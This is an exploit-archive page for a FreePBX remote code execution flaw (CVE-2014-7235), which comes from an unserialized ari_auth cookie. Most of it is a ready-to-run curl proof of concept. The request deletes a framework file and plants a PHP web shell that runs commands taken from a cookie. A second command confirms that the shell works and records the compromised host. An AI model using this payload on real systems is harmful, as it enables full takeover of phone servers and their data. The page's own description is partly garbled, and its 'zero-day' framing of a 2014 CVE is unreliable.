Skip to content
cyberexploits
webappphptext

Freepbx < 2.11.1.5 - Remote Code Execution

Freepbx < 2.11.1.5 - Remote Code Execution

Published on 2016-12-23

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/41005.txt7eac4c3a
raw
Exploit Title: Freepbx coockie recordings injection

Google Dork: Ask Santa

Date: 23/12/2016

Exploit Author: inj3ctor3

Vendor Homepage: https://www.freepbx.org/

Software Link: ISO LINKS IN SITE https://www.freepbx.org/

Version: ALL && unpatched/ (Trixbox/freepbx/elastix/pbxinflash/)

Tested on: Centos 6

CVE : CVE-2014-7235



1. Description



a critical Zero-Day Remote Code Execution and Privilege Escalation 

exploit within the legacy “FreePBX ARI Framework module/Asterisk 

Recording Interface (ARI)”.

htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x, 

and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth coockie, 

related to the PHP unserialize function



<?php

.....

...

line 56 $buf = unserialize(stripslashes($_COOKIE['ari_auth']));

 line 57 list($data,$chksum) = $buf;

....

?>



A successful attack may compromise the whole system aiding the hacker to gain



further privileges via taking advantage of famous nmap shell 



without further or do this is a poc code



curl -ks -m20 http://127.0.0.1/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "<?php if(\$_COOKIE[\"lang\"]) {system(\$_COOKIE[\"lang\"]);}die();?>");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null



if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi

 
View on GitHub